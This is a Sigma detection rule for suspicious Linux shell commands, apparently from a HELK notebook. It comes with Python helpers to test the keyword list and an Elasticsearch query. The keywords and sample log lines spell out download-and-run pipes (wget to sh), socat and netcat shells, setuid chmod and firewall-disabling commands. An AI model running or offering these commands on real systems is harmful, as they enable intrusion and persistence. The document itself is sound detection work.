Suspicious Activity in Shell Commands

Detects suspicious shell commands used in various exploit codes (see references)

Rule Content

- title: Suspicious Activity in Shell Commands
  id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695
  description: Detects suspicious shell commands used in various exploit codes (see
    references)
  references:
  - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
  - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb#L121
  - http://pastebin.com/FtygZ1cg
  - https://artkond.com/2017/03/23/pivoting-guide/
  author: Florian Roth
  date: 2017/08/21
  modified: 2019/02/05
  logsource:
    product: linux
    service: null
    category: null
  detection:
    keywords:
    - wget * - http* | perl
    - wget * - http* | sh
    - wget * - http* | bash
    - python -m SimpleHTTPServer
    - -m http.server
    - import pty; pty.spawn*
    - socat exec:*
    - socat -O /tmp/*
    - socat tcp-connect*
    - '*echo binary >>*'
    - '*wget *; chmod +x*'
    - '*wget *; chmod 777 *'
    - '*cd /tmp || cd /var/run || cd /mnt*'
    - '*stop;service iptables stop;*'
    - '*stop;SuSEfirewall2 stop;*'
    - chmod 777 2020*
    - '*>>/etc/rc.local'
    - '*base64 -d /tmp/*'
    - '* | base64 -d *'
    - '*/chmod u+s *'
    - '*chmod +s /tmp/*'
    - '*chmod u+s /tmp/*'
    - '* /tmp/haxhax*'
    - '* /tmp/ns_sploit*'
    - nc -l -p *
    - cp /bin/ksh *
    - cp /bin/sh *
    - '* /tmp/*.b64 *'
    - '*/tmp/ysocereal.jar*'
    - '*/tmp/x *'
    - '*; chmod +x /tmp/*'
    - '*;chmod +x /tmp/*'
    condition: keywords
  falsepositives:
  - Unknown
  level: high
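
The keyword list can be exercised locally before the rule is shipped to a SIEM, which is the quickest way to see which clauses fire on a given command line and which ones are broader than they look. The following Python is an added example, not part of the Sigma rule or the HELK notebook: it compiles each keyword into a case-insensitive regex, treating `*` and `?` as wildcards and everything else as a substring to find (an assumption about how Sigma backends treat bare keywords), and runs the whole list over a few constructed log lines (`SAMPLE_LOG_LINES`, invented here with a documentation address, not real telemetry).

```python
import re

# Keyword list copied from the Sigma rule above.
KEYWORDS = [
    "wget * - http* | perl",
    "wget * - http* | sh",
    "wget * - http* | bash",
    "python -m SimpleHTTPServer",
    "-m http.server",
    "import pty; pty.spawn*",
    "socat exec:*",
    "socat -O /tmp/*",
    "socat tcp-connect*",
    "*echo binary >>*",
    "*wget *; chmod +x*",
    "*wget *; chmod 777 *",
    "*cd /tmp || cd /var/run || cd /mnt*",
    "*stop;service iptables stop;*",
    "*stop;SuSEfirewall2 stop;*",
    "chmod 777 2020*",
    "*>>/etc/rc.local",
    "*base64 -d /tmp/*",
    "* | base64 -d *",
    "*/chmod u+s *",
    "*chmod +s /tmp/*",
    "*chmod u+s /tmp/*",
    "* /tmp/haxhax*",
    "* /tmp/ns_sploit*",
    "nc -l -p *",
    "cp /bin/ksh *",
    "cp /bin/sh *",
    "* /tmp/*.b64 *",
    "*/tmp/ysocereal.jar*",
    "*/tmp/x *",
    "*; chmod +x /tmp/*",
    "*;chmod +x /tmp/*",
]

# Constructed sample log lines (not real telemetry); 198.51.100.0/24 is a
# documentation range. Lines 0, 1, 2 and 4 should alert, line 3 should not.
SAMPLE_LOG_LINES = [
    "wget -q -O - http://198.51.100.7/i.sh | sh",
    "cd /tmp || cd /var/run || cd /mnt; wget http://198.51.100.7/bot; chmod +x bot",
    "python3 -m http.server 8080",
    "ls -la /tmp",
    "echo aGVsbG8= | base64 -d > /tmp/x; chmod +x /tmp/x",
]


def keyword_to_regex(keyword):
    """Compile one Sigma keyword into a regex.

    Assumption (how common backends treat keywords): the comparison is a
    case-insensitive substring match, '*' matches any run of characters,
    '?' matches exactly one character, and everything else is literal.
    """
    parts = re.split(r"([*?])", keyword)
    pattern = "".join(
        ".*" if p == "*" else "." if p == "?" else re.escape(p) for p in parts
    )
    return re.compile(pattern, re.IGNORECASE | re.DOTALL)


COMPILED = [(kw, keyword_to_regex(kw)) for kw in KEYWORDS]


def matching_keywords(line):
    """Return the rule keywords that match one log line, in rule order.

    An empty list means the rule would not fire on that line.
    """
    return [kw for kw, rx in COMPILED if rx.search(line)]


def scan_lines(lines):
    """Map each alerting line to the keywords that fired; quiet lines are omitted."""
    hits = {}
    for line in lines:
        matched = matching_keywords(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, matched in scan_lines(SAMPLE_LOG_LINES).items():
        print(f"{line!r}\n    -> {matched}")
```

Running the script shows which clause produced each hit, which is exactly the context an analyst wants when triaging a `level: high` alert with `falsepositives: Unknown`. Build tooling, package post-install scripts and administrators' own one-liners will occasionally trip the broader clauses such as `* | base64 -d *`, so the keyword that fired is worth keeping alongside the raw command line in the alert.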

Querying Elasticsearch

Import Libraries


In [ ]:
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import pandas as pd

Initialize Elasticsearch client


In [ ]:
# HELK's Elasticsearch endpoint; 'logs-*' covers the indices HELK writes Linux events to
es = Elasticsearch(['http://helk-elasticsearch:9200'])
searchContext = Search(using=es, index='logs-*', doc_type='doc')

Run Elasticsearch Query


In [ ]:
# Raw string: the query is full of backslash escapes required by query_string syntax,
# and a plain string literal would raise invalid-escape warnings without changing them
s = searchContext.query('query_string', query=r'\*.keyword:(*wget\ *\ \-\ http*\ |\ perl* OR *wget\ *\ \-\ http*\ |\ sh* OR *wget\ *\ \-\ http*\ |\ bash* OR *python\ \-m\ SimpleHTTPServer* OR *\-m\ http.server* OR *import\ pty;\ pty.spawn* OR *socat\ exec\:* OR *socat\ \-O\ \/tmp\/* OR *socat\ tcp\-connect* OR *echo\ binary\ * OR *wget\ *;\ chmod\ \+x* OR *wget\ *;\ chmod\ 777\ * OR *cd\ \/tmp\ \||\ cd\ \/var\/run\ \||\ cd\ \/mnt* OR *stop;service\ iptables\ stop;* OR *stop;SuSEfirewall2\ stop;* OR *chmod\ 777\ 2020* OR *\/etc\/rc.local* OR *base64\ \-d\ \/tmp\/* OR *\ |\ base64\ \-d\ * OR *\/chmod\ u\+s\ * OR *chmod\ \+s\ \/tmp\/* OR *chmod\ u\+s\ \/tmp\/* OR *\ \/tmp\/haxhax* OR *\ \/tmp\/ns_sploit* OR *nc\ \-l\ \-p\ * OR *cp\ \/bin\/ksh\ * OR *cp\ \/bin\/sh\ * OR *\ \/tmp\/*.b64\ * OR *\/tmp\/ysocereal.jar* OR *\/tmp\/x\ * OR *;\ chmod\ \+x\ \/tmp\/* OR *;chmod\ \+x\ \/tmp\/*)')
response = s.execute()
if response.success():
    # execute() returns only the first page of hits; scan() iterates over all of them
    df = pd.DataFrame((d.to_dict() for d in s.scan()))
else:
    # Keep df defined so the next cell does not fail with a NameError
    df = pd.DataFrame()

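The generated query does not read exactly like the rule: every space, `-`, `+`, `:` and `/` is backslash-escaped, `||` became `\||`, and the `>>` has vanished from `*echo binary >>*` and `*>>/etc/rc.local`. That is the Elasticsearch query_string syntax at work: those characters are reserved operators, and `<` and `>` cannot be escaped at all (they would start a range query), so a converter has no option but to drop them. The function below is an added example, a simplified re-implementation of that escaping and not sigmac's own backend; `escape_keyword`, `build_query` and `_RESERVED` are names chosen here. It reproduces the clauses visible in the query above from the rule's keywords.

```python
import re

# Operators of the query_string syntax. Sigma wildcards '*' and '?' are
# deliberately left alone so they keep working; '&&' and '||' are escaped as
# one unit, which is why the converted rule shows 'cd\ \/tmp\ \||\ cd'.
# Assumption: this set mirrors the visible output, not sigmac's source.
_RESERVED = re.compile(r'(&&|\|\||[\s+\-=!(){}\[\]^"~:/\\])')


def escape_keyword(keyword):
    """Escape one Sigma keyword into a query_string clause.

    '<' and '>' cannot be escaped in query_string syntax, so they are dropped
    (hence '*echo binary >>*' -> '*echo\\ binary\\ *'). The result is wrapped
    in '*' when needed so it behaves as a substring match like a Sigma keyword.
    """
    value = keyword.replace("<", "").replace(">", "")
    value = _RESERVED.sub(r"\\\1", value)
    if not value.startswith("*"):
        value = "*" + value
    if not value.endswith("*"):
        value = value + "*"
    return value


def build_query(keywords, field=r"\*.keyword"):
    """OR the escaped keywords together over a field, as in the notebook cell."""
    return field + ":(" + " OR ".join(escape_keyword(k) for k in keywords) + ")"


if __name__ == "__main__":
    for kw in ["wget * - http* | perl", "*echo binary >>*", "*>>/etc/rc.local"]:
        print(f"{kw!r:40} -> {escape_keyword(kw)}")
    print(build_query(["socat exec:*", "nc -l -p *"]))
```

Dropping `>>` has a side effect worth remembering when triaging hits: `*echo\ binary\ *` matches any command containing `echo binary ` and `*\/etc\/rc.local*` matches any mention of that file, both broader than the rule author wrote. Reviewing the converted query against the original keywords, as this function makes easy, is a cheap check to run whenever a rule is translated for a new backend.
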
Show Results


In [ ]:
df.head()